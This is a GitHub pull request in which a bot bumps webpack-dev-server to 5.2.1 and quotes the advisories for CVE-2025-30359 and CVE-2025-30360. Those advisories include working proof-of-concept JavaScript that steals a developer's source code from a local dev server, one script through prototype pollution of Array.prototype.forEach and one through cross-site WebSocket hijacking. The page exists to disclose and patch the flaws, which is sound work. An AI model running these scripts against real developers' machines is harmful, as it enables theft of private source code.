router icon indicating copy to clipboard operation
router copied to clipboard

Published 20 hours ago β€’ verified publisher icon TanStack

chore(deps): update dependency webpack-dev-server to v5.2.1 [security]

Open renovate[bot] opened this issue 5 months ago β€’ 2 comments

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
webpack-dev-server 5.2.0 -> 5.2.1 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2025-30359

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
  5. You can see the source code output in the document and the devtools console.

image

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__. It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
  5. Open the devtools console.
  6. You can see the content of src/index.js and other scripts loaded.

image

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

CVE-2025-30360

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732. But webpack-dev-server always allows IP address Origin headers. https://github.com/webpack/webpack-dev-server/blob/55220a800ba4e30dbde2d98785ecf4c80b32f711/lib/Server.js#L3113-L3127 This allows websites that are served on IP addresses to connect WebSocket. By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.

related commit: https://github.com/webpack/webpack-dev-server/commit/72efaab83381a0e1c4914adf401cbd210b7de7eb (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.

PoC

  1. Download reproduction.zip and extract it
  2. Run npm i
  3. Run npx webpack-dev-server
  4. Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
  5. Edit src/index.js in the extracted directory
  6. You can see the content of src/index.js

image

The script in the POC site is:

window.webpackHotUpdate = (...args) => {
    console.log(...args);
    for (i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText
	    console.log(args[1][i])
    }
}

let params = new URLSearchParams(window.location.search);
let target = new URL(params.get('target') || 'http://127.0.0.1:8080');
let file = params.get('file')
let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';
let wsPort = target.port;
var currentHash = '';
var currentHash2 = '';
let wsTarget = `${wsProtocol}://${target.hostname}:${wsPort}/ws`;
ws = new WebSocket(wsTarget);
ws.onmessage = event => {
    console.log(event.data);
    if (event.data.match('"type":"ok"')) {
        s = document.createElement('script');
        s.src = `${target}${file}.${currentHash2}.hot-update.js`;
        document.body.appendChild(s)
    }
    r = event.data.match(/"([0-9a-f]{20})"/);
    if (r !== null) {
        currentHash2 = currentHash;
        currentHash = r[1];
        console.log(currentHash, currentHash2);
    }
}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

webpack/webpack-dev-server (webpack-dev-server)

v5.2.1

Compare Source

Security
  • cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
  • requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes
  • prevent overlay for errors caught by React error boundaries (#​5431) (8c1abc9)
  • take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#​5411) (ffd0b86)

Configuration

πŸ“… Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled because a matching PR was automerged previously.

β™» Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

πŸ”• Ignore: Close this PR and you won't be reminded about this update again.

  • [ ] If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate[bot] avatar Jun 10 '25 21:06 renovate[bot]

πŸ€– Nx Cloud AI Fix Eligible

An automatically generated fix could have helped fix failing tasks for this run, but Self-healing CI is disabled for this workspace. Visit workspace settings to enable it and get automatic fixes in future runs.

To disable these notifications, a workspace admin can disable them in workspace settings.

View your CI Pipeline Execution β†— for commit a9ed208366bb5377f39f5e8677f4d9af37c594f3

Command Status Duration Result
nx affected --targets=test:eslint,test:unit,tes... ❌ Failed 9m 51s View β†—
nx run-many --target=build --exclude=examples/*... ❌ Failed 1m 41s View β†—

☁️ Nx Cloud last updated this comment at 2025-11-20 19:29:07 UTC

nx-cloud[bot] avatar Jun 10 '25 21:06 nx-cloud[bot]

More templates

@tanstack/arktype-adapter

npm i https://pkg.pr.new/TanStack/router/@tanstack/arktype-adapter@4368
@tanstack/directive-functions-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/directive-functions-plugin@4368
@tanstack/eslint-plugin-router

npm i https://pkg.pr.new/TanStack/router/@tanstack/eslint-plugin-router@4368
@tanstack/history

npm i https://pkg.pr.new/TanStack/router/@tanstack/history@4368
@tanstack/react-router

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-router@4368
@tanstack/react-router-devtools

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-router-devtools@4368
@tanstack/react-router-with-query

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-router-with-query@4368
@tanstack/react-start

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-start@4368
@tanstack/react-start-client

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-start-client@4368
@tanstack/react-start-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-start-plugin@4368
@tanstack/react-start-server

npm i https://pkg.pr.new/TanStack/router/@tanstack/react-start-server@4368
@tanstack/router-cli

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-cli@4368
@tanstack/router-core

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-core@4368
@tanstack/router-devtools

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-devtools@4368
@tanstack/router-devtools-core

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-devtools-core@4368
@tanstack/router-generator

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-generator@4368
@tanstack/router-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-plugin@4368
@tanstack/router-utils

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-utils@4368
@tanstack/router-vite-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/router-vite-plugin@4368
@tanstack/server-functions-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/server-functions-plugin@4368
@tanstack/solid-router

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-router@4368
@tanstack/solid-router-devtools

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-router-devtools@4368
@tanstack/solid-start

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-start@4368
@tanstack/solid-start-client

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-start-client@4368
@tanstack/solid-start-plugin

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-start-plugin@4368
@tanstack/solid-start-server

npm i https://pkg.pr.new/TanStack/router/@tanstack/solid-start-server@4368
@tanstack/start-client-core

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-client-core@4368
@tanstack/start-plugin-core

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-plugin-core@4368
@tanstack/start-server-core

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-server-core@4368
@tanstack/start-server-functions-client

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-server-functions-client@4368
@tanstack/start-server-functions-fetcher

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-server-functions-fetcher@4368
@tanstack/start-server-functions-server

npm i https://pkg.pr.new/TanStack/router/@tanstack/start-server-functions-server@4368
@tanstack/valibot-adapter

npm i https://pkg.pr.new/TanStack/router/@tanstack/valibot-adapter@4368
@tanstack/virtual-file-routes

npm i https://pkg.pr.new/TanStack/router/@tanstack/virtual-file-routes@4368
@tanstack/zod-adapter

npm i https://pkg.pr.new/TanStack/router/@tanstack/zod-adapter@4368

commit: d0e6dfb

pkg-pr-new[bot] avatar Jun 10 '25 21:06 pkg-pr-new[bot]

Walkthrough

TypeScript type definition updated in Cloudflare worker configuration to enforce stricter string literal types. String bindings now preserve their literal values rather than widening to generic string types, with consistent single-quote formatting applied throughout.

Changes

Cohort / File(s) Summary
TypeScript type definitions
e2e/solid-start/basic-cloudflare/worker-configuration.d.ts		 Updated Cloudflare.Env interface to use string literal 'Hello from Cloudflare' with single quotes. Modified StringifyValues type alias to preserve string literal types instead of widening to string. Updated NodeJS.ProcessEnv declaration with consistent single-quote syntax.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

  • Type preservation logic: Verify that StringifyValues correctly maintains literal types for string-valued bindings
  • No runtime impact: Changes are type-level only; behavioral verification unnecessary
  • Single file scope: Limited surface area for review

Poem

🐰 String literals dance in single quotes so bright, Types now preserved, no widening in sight, From double to single, the formatting gleams, Stricter constraints fulfill a rabbit's type-dreams! ✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Check name Status Explanation Resolution
Title check ⚠️ Warning The PR title states an update to webpack-dev-server, but the actual change is to a TypeScript type definition file (worker-configuration.d.ts) for Cloudflare Worker configuration, unrelated to webpack-dev-server. Update the title to accurately reflect the actual changes: describe the TypeScript type definition updates for Cloudflare Worker string literal type preservation instead of the webpack-dev-server dependency update.
βœ… Passed checks (2 passed)
Check name Status Explanation
Description Check βœ… Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage βœ… Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
✨ Finishing touches
  • [ ] πŸ“ Generate docstrings
πŸ§ͺ Generate unit tests (beta)
  • [ ] Create PR with unit tests
  • [ ] Post copyable unit tests in a comment
  • [ ] Commit unit tests in branch renovate/npm-webpack-dev-server-vulnerability
πŸ“œ Recent review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

πŸ“₯ Commits

Reviewing files that changed from the base of the PR and between 282cefb7e14a9d6bfe7eacbc61f76b1ffb9555ae and a9ed208366bb5377f39f5e8677f4d9af37c594f3.

β›” Files ignored due to path filters (1)
  • pnpm-lock.yaml is excluded by !**/pnpm-lock.yaml
πŸ“’ Files selected for processing (1)
  • e2e/solid-start/basic-cloudflare/worker-configuration.d.ts (1 hunks)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Test
  • GitHub Check: Preview
πŸ”‡ Additional comments (1)
e2e/solid-start/basic-cloudflare/worker-configuration.d.ts (1)

5-18: Strongly typed env var mapping looks correct

Cloudflare.Env.MY_VAR as a string literal plus StringifyValues and the NodeJS.ProcessEnv extension correctly preserve the literal type for process.env.MY_VAR while remaining compatible with typical ProcessEnv definitions. No issues spotted.

Comment @coderabbitai help to get the list of available commands and usage tips.

coderabbitai[bot] avatar Aug 19 '25 17:08 coderabbitai[bot]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

renovate[bot] avatar Nov 20 '25 20:11 renovate[bot]